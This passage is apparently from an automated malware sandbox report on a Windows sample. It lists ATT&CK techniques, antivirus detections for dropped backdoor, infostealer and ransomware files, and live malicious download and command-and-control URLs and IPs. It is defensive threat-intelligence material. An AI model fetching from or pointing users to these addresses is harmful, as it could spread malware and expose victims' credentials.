Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5960B0 listen,WSAGetLastError,	0_2_6C5960B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5222D0 sqlite3_bind_blob,	0_2_6C5222D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5963C0 PR_Bind,	0_2_6C5963C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C599400 sqlite3_bind_int64,	0_2_6C599400
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5994C0 sqlite3_bind_text,	0_2_6C5994C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5994F0 sqlite3_bind_text16,	0_2_6C5994F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C599480 sqlite3_bind_null,	0_2_6C599480

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	31 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	111 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Extra Window Memory Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Windows Service	1 Windows Service	31 Obfuscated Files or Information	Security Account Manager	459 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	512 Process Injection	32 Software Packing	NTDS	1191 Security Software Discovery	Distributed Component Object Model	11 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	121 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 PowerShell	RC Scripts	121 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	481 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	23 Masquerading	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	481 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	512 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Rundll32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	45%	ReversingLabs	Win32.Trojan.Symmi
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\ProgramData\Package Cache\SystemSettings.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/ATRAPS.Gen
C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\wTMEVe8[1].exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	100%	Joe Sandbox ML
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\Package Cache\SystemSettings.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ntRoEwh[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Google\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\ProgramData\Package Cache\SystemSettings.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Recovery\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	45%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	45%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\wTMEVe8[1].exe	26%	ReversingLabs	Win32.Trojan.Stelpak
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ntRoEwh[1].exe	18%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	18%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	37%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	26%	ReversingLabs	Win32.Trojan.Stelpak
C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	18%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	37%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	45%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	18%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	18%	ReversingLabs
C:\Users\user\AppData\Local\Temp\jbrdiqcrtdja.sys	5%	ReversingLabs
C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\Desktop\BVPoHZLO.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\CFNWwRDq.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\DBkeOEgG.log	8%	ReversingLabs
C:\Users\user\Desktop\FwENDODk.log	25%	ReversingLabs
C:\Users\user\Desktop\IwlvVjWA.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KhRLcxhs.log	16%	ReversingLabs
C:\Users\user\Desktop\NjDuyglo.log	4%	ReversingLabs
C:\Users\user\Desktop\TNeBQEiF.log	25%	ReversingLabs
C:\Users\user\Desktop\WDUsXAjy.log	8%	ReversingLabs
C:\Users\user\Desktop\XXhkisgW.log	25%	ReversingLabs
C:\Users\user\Desktop\YUJsDsvR.log	29%	ReversingLabs
C:\Users\user\Desktop\ZoAIeOtr.log	16%	ReversingLabs
C:\Users\user\Desktop\aINBpFrP.log	12%	ReversingLabs
C:\Users\user\Desktop\cLzjLovK.log	25%	ReversingLabs
C:\Users\user\Desktop\cvxRAgnn.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\gmoIHdog.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\hGBASUlD.log	8%	ReversingLabs
C:\Users\user\Desktop\lZGHkaDU.log	8%	ReversingLabs
C:\Users\user\Desktop\pXgQVFeT.log	21%	ReversingLabs
C:\Users\user\Desktop\qMYGMWSI.log	29%	ReversingLabs
C:\Users\user\Desktop\rYNynbxj.log	21%	ReversingLabs
C:\Users\user\Desktop\tSQOebbY.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\vIZXTCIC.log	4%	ReversingLabs
C:\Users\user\Desktop\yyQNbzJv.log	12%	ReversingLabs

Source	Detection	Scanner	Label
http://185.215.113.206/c4becf79229cb002.php/U0R	100%	Avira URL Cloud	malware
https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M	0%	Avira URL Cloud	safe
http://185.215.113.16/well/random.exe8	100%	Avira URL Cloud	malware
http://185.215.113.206/n:	100%	Avira URL Cloud	malware
http://185.215.113.206/user-PC	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/nss3.dll8	100%	Avira URL Cloud	malware
http://185.215.113.16/off/random.exe9e	100%	Avira URL Cloud	malware
http://185.215.113.16/off/random.exe08	100%	Avira URL Cloud	malware
https://atten-supporse.biz/api#D	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php$9	100%	Avira URL Cloud	malware
http://185.215.113.16/off/random.exec	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/freebl3.dllz	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/mozglue.dll~	100%	Avira URL Cloud	malware
http://185.215.113.16/off/random.exek	100%	Avira URL Cloud	malware
https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe	0%	Avira URL Cloud	safe
http://woo097878781.win	0%	Avira URL Cloud	safe
http://31.41.244.11/files/5131681669/KeaEfrP.ps1RN###	100%	Avira URL Cloud	malware
http://77.73.39.158/4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpmRoot=C:	100%	Avira URL Cloud	malware
http://185.215.113.16/off/random.exec6~	100%	Avira URL Cloud	malware
https://atten-supporse.biz/QQ	100%	Avira URL Cloud	malware
https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0	0%	Avira URL Cloud	safe
https://woo097878781.win/downloaded_file.bin	0%	Avira URL Cloud	safe
http://31.41.244.11/files/5131681669/KeaEfrP.ps1	100%	Avira URL Cloud	malware
http://185.215.113.16/well/random.exev	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
star-mini.c10r.facebook.com	157.240.195.35	true	false	high
atten-supporse.biz	104.21.16.9	true	false	high
twitter.com	104.244.42.1	true	false	high
youtube-ui.l.google.com	172.217.17.46	true	false	high
www3.l.google.com	142.250.181.142	true	false	high
plus.l.google.com	172.217.17.78	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	high
reddit.map.fastly.net	151.101.1.140	true	false	high
www.google.com	216.58.208.228	true	false	high
pool.hashvault.pro	37.203.243.102	true	false	high
dyna.wikimedia.org	185.15.58.224	true	false	high
woo097878781.win	154.216.20.243	true	true	unknown
www.facebook.com	unknown	unknown	false	high
www.reddit.com	unknown	unknown	false	high
ogs.google.com	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false		high
dare-curbys.biz	false		high
http://185.215.113.206/	false		high
http://185.215.113.43/Zu7JuNko/index.php	false		high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false		high
formy-spill.biz	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://atten-supporse.biz/api	false		high
http://detectportal.firefox.com/canonical.html	false		high
atten-supporse.biz	false		high
print-vexer.biz	false		high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false		high
impend-differ.biz	false		high
http://77.73.39.158/4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php	true	Avira URL Cloud: malware	unknown
https://woo097878781.win/downloaded_file.bin	true	Avira URL Cloud: safe	unknown
http://185.215.113.16/mine/random.exe	false		high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false		high
dwell-exclaim.biz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M	powershell.exe, 0000001C.00000002.2807680074.0000000006125000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2807680074.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 00000024.00000000.2762185541.0000000000946000.00000008.00000001.01000000.0000001C.sdmp, downloaded_file.exe, 00000024.00000002.2769113649.0000000000946000.00000008.00000001.01000000.0000001C.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000002.00000003.1776028720.000002554F6A3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dll8	file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.php/U0R	50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/off/random.exe08	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.php$9	file.exe, 00000000.00000002.2121699779.000000000BF9C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.sajatypeworks.com	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000002.00000003.1776028720.000002554F672000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 0000001C.00000002.2777328250.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api#D	60c1233683.exe, 00000022.00000002.2958937922.0000000000D23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.urwpp.deDPlease	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	wVBhC3KCkV.exe, 00000013.00000002.2486333803.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2777328250.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.0000000002761000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000002.00000003.1776028720.000002554F6C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/well/random.exe	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2126531064.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	callmobile.exe, 0000001B.00000002.2962692398.0000000003171000.00000004.00000800.00020000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php#	50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/n:	50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000002.00000002.2970111477.000002554F400000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/well/random.exe8	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.php/	50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe9e	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1860911185.0000000005E5D000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2753720276.00000000055FA000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2752316946.00000000055FA000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728503436.0000000005601000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728640685.00000000055FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/user-PC	50c9f14fb7.exe, 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/off/random.exec	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	60c1233683.exe, 00000022.00000003.2791004854.00000000057C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php2	file.exe, 00000000.00000002.2121699779.000000000BFAA000.00000004.00000020.00020000.00000000.sdmp, 50c9f14fb7.exe, 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe	powershell.exe, 0000001C.00000002.2807680074.0000000006120000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2807680074.00000000060A2000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 00000024.00000000.2762185541.0000000000941000.00000008.00000001.01000000.0000001C.sdmp, downloaded_file.exe, 00000024.00000002.2769113649.0000000000942000.00000008.00000001.01000000.0000001C.sdmp, explorer.exe, 00000027.00000002.2956724746.0000000002E2E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.206/68b591d6548ec281/freebl3.dllz	file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
